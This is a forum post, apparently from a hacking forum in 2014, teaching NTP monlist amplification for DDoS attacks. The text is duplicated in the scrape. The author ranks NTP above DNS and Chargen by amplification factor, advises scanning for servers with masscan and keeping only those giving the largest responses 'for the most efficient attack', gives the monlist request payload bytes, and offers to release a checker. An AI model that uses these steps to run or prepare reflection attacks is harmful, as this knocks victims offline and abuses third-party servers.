NTP DDoS Amplification Vector 03-12-2014, 04:46 AM
#1
Introduction
Hello, today we will be discussing an increasingly common ddos amplification vector called NTP (Network Time Protocol). NTP is far more superior over DNS and Chargen, the response size is MUCH larger then both of them and the response is split into multiple packets making it even more deadly (high pp/s).
Here's a comparison:
How NTP Amplification Works
NTP Amplification works by sending a monlist command (payload is at the bottom of the post). A monlist command requests the server to return the last 600 ip addresses it has connected with. The request is only 234 bytes long and the response is huge, split into multiple packets. When performing an NTP attack, the output is based of popularity of the servers not quantity. Some NTP servers will not have the max 600 addresses in the monlist command, so you want to filter these out for the most efficient attack. You can do this by using masscan to scan for NTP servers and writing a checker that sends the monlist payload (posted below) and checks what the size is of the response it returns back (remember the response is split into multiple packets each with a max size of 440!)
Payloads
Here is the monlist command payload:
Other
If you have any questions i'll be glad to help you, if I get enough feedback I will release my checker written in Java.
Hello, today we will be discussing an increasingly common ddos amplification vector called NTP (Network Time Protocol). NTP is far more superior over DNS and Chargen, the response size is MUCH larger then both of them and the response is split into multiple packets making it even more deadly (high pp/s).
Here's a comparison:
- DNS - ~30 times amplification factor
- Chargen - ~15 times amplification factor
- NTP - 200+ amplification factor (split into multiple packets 440 bytes each)
How NTP Amplification Works
NTP Amplification works by sending a monlist command (payload is at the bottom of the post). A monlist command requests the server to return the last 600 ip addresses it has connected with. The request is only 234 bytes long and the response is huge, split into multiple packets. When performing an NTP attack, the output is based of popularity of the servers not quantity. Some NTP servers will not have the max 600 addresses in the monlist command, so you want to filter these out for the most efficient attack. You can do this by using masscan to scan for NTP servers and writing a checker that sends the monlist payload (posted below) and checks what the size is of the response it returns back (remember the response is split into multiple packets each with a max size of 440!)
Payloads
Here is the monlist command payload:
Code:
23, 0, 3, 42, 0, 0, 0, 0Other
If you have any questions i'll be glad to help you, if I get enough feedback I will release my checker written in Java.
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: awT6i.gif]](http://puu.sh/awT6i.gif)
![[Image: fSEZXPs.png]](https://i.imgur.com/fSEZXPs.png)
![[Image: 383dbcbdd0eb954803ad9bc4f8934f82.png]](http://i.gyazo.com/383dbcbdd0eb954803ad9bc4f8934f82.png)
.png "Donator (Rank I)")
